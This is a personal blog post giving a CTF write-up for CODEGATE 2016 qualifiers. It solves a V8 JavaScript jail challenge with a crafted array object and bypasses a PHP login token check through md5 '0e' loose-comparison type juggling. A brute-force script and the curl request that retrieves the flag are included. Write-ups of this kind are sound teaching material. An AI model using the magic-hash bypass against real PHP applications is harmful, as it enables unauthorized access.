読者です 読者をやめる 読者になる 読者になる

ヾノ*>ㅅ<)ノシ帳

技術ブログに見せかけて、ジャンル制限のないふりーだむなブログです。

CODEGATE 2016 Quals - Writeup

CTF

i participated in CODEGATE 2016 Quals as a member of Ping-Mic.

solved:

  • JS_is_not_a_jail (misc100)

helped to solve:

  • Combination Pizza (web222)

JS_is_not_a_jail

First, i checked challenge100 function.

[JavaScript Jail]
let start to type on 'challenge100'
V8 version 5.1.0 (candidate)
d8> challenge100
function (arr) {
        var random_value = "ac1a39300ce7ee8b6cff8021fd7b0b5caf5bc1c316697bd8f22e00f9fab710d6b8dba23ca80f6d80ca697e7aa26fd5f6";
        var check = "20150303";

        if((arr === null || arr === undefined)) {
            print("arr is null or undefined.");
            return;
        }

        if(!arr.hasOwnProperty('length')) {
            print("length property is null or undefined.");
            return;
        }

        if(arr.length >= 0) {
            print("i think you're not geek. From now on, a GEEK Only!");
            return;
        }

        if(Object.getPrototypeOf(arr) !== Array.prototype) {
            print("Oh.... can you give me an array?");
            return;
        }

        var length = check.length;
        for(var i=0;i<length;i++) {
            arr[i] = random_value[Math.floor(Math.random() * random_value.length)];
        }

        for(i=0;i<length;i++) {
            if(arr[i] !== check[i]) {
                print("Umm... i think 2015/03/03 is so special day.\nso you must set random value to 20150303 :)");
                return;
            }
        }
        print("Yay!!");
        print(flag);
    }
d8> 

Next, I made class MyArray. It has length propaty which returns -1, and its value cannot be re-write. To prohibit re-write value, i used Object.defineProperty().

MyArray = function (){
    this.__proto__ = Array.prototype;
    this[0] = "2";
    this[1] = "0";
    this[2] = "1";
    this[3] = "5";
    this[4] = "0";
    this[5] = "3";
    this[6] = "0";
    this[7] = "3";
    this.length = -1;
    return this;
};
var _arr = MyArray();
console.log(Object.getOwnPropertyNames(_arr));
for(var i = 0; i <= 7; i+=1){
    _arr = Object.defineProperty(_arr, i.toString(10), {
        writable: false
    });
}
console.log(_arr.length);

challenge100(_arr);

function challenge100 (arr) {
    var random_value = "ac1a39300ce7ee8b6cff8021fd7b0b5caf5bc1c316697bd8f22e00f9fab710d6b8dba23ca80f6d80ca697e7aa26fd5f6";
    var check = "20150303";
    var print = console.log;
    var flag = "test_flag{this is test}";

    if((arr === null || arr === undefined)) {
        print("arr is null or undefined.");
        return;
    }

    if(!arr.hasOwnProperty('length')) {
        print("length property is null or undefined.");
        return;
    }

    if(arr.length >= 0) {
        print("i think you're not geek. From now on, a GEEK Only!");
        return;
    }

    if(Object.getPrototypeOf(arr) !== Array.prototype) {
        print("Oh.... can you give me an array?");
        return;
    }

    var length = check.length;
    for(var i=0;i<length;i++) {
        arr[i] = random_value[Math.floor(Math.random() * random_value.length)];
    }
    console.log(arr);

    for(i=0;i<length;i++) {
        if(arr[i] !== check[i]) {
            print("Umm... i think 2015/03/03 is so special day.\nso you must set random value to 20150303 :)");
            return;
        }
    }
    print("Yay!!");
    print(flag);
}

Third, i ran this code locally to see if it works. node is good for debugging environment.

Finally, i formatted this code, and pasted to JavaScript Jail.

MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; 
var _arr = MyArray();
console.log(Object.getOwnPropertyNames(_arr));
for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });}
$ nc 175.119.158.131 1129 
[JavaScript Jail]
let start to type on 'challenge100'
V8 version 5.1.0 (candidate)
d8> MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; 
var _arr = MyArray();
console.log(Object.getOwnPropertyNames(_arr));
for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });}
challenge100(_arr);MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; 
function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }
d8> var _arr = MyArray();
undefined
d8> console.log(Object.getOwnPropertyNames(_arr));
(d8):1: ReferenceError: console is not defined
console.log(Object.getOwnPropertyNames(_arr));
^
ReferenceError: console is not defined
    at (d8):1:1

d8> for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });}
[]
d8> 
challenge100(_arr);challenge100(_arr);
Yay!!
flag is "easy xD, get a more hardest challenge!"
undefined

Combination Pizza

This is _login_ck.php:


<?php
    include "./lib/for_flag.php";
    include "./lib/lib.php";

    $user = mysql_real_escape_string($_POST['user']);
    $pass = mysql_real_escape_string($_POST['pass']);
    $token = $_POST['token'];

    $que = "select user from login where user='{$user}' and pass=md5('{$pass}')";
    $result = mysql_query($que);
    $row = mysql_fetch_array($result);

    if($row['user'] == 'Admin')
    {
        if(md5("blog".$token) == '0e689047178306969035064392896674')
        {
            echo "good job !!!<br />FLAG : <b>".$flag."</b>";
        }
        else
        {
            echo "Incorrect Token";
        }
    }
    else
    {
        echo "Incorrect ID or Password";
    }

?>

i noticed that md5("blog".$token) == '0e689047178306969035064392896674' should be 0 == 0 (numeric compare) in a cirtain $token. @mrtc0 found this post:

PHP: md5('240610708') == md5('QNKCDZO') | Hacker News

So i ran this php script:

<?php
$test = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "p", "Q", "R", "S", "T", "U"];
for($i = 0, $len = count($test); $i < $len; $i += 1){
for($j = 0, $len = count($test); $j < $len; $j += 1){
for($k = 0, $len = count($test); $k < $len; $k += 1){
for($l = 0, $len = count($test); $l < $len; $l += 1){
for($m = 0, $len = count($test); $m < $len; $m += 1){
    $token  = "\n" . $test[$i] . $test[$j] . $test[$k] . $test[$l] . $test[$m];
    if(md5("blog".$token) == '0e689047178306969035064392896674'){
        echo "\$token = " . urlencode($token) . "\n    => " . md5("blog".$token) . "\n";
    }
}
}
}
}
}
$ php ./web222_n.php
$token = %0AtDMwy
    => 0e163908937933900237353340463810

Good!! $token = "%0AtDMwy" gives me the flag:

curl http://175.119.158.137:9242/f00885da9ad9ad5fcccaa8fc1217e3ae/login_ck.php -d "user=Admin" -d "pass=adminpw" -d 'token=%0AtDMwy' 
good job !!!<br />FLAG : <b>jjambbong_WEBHACKING!!@!</b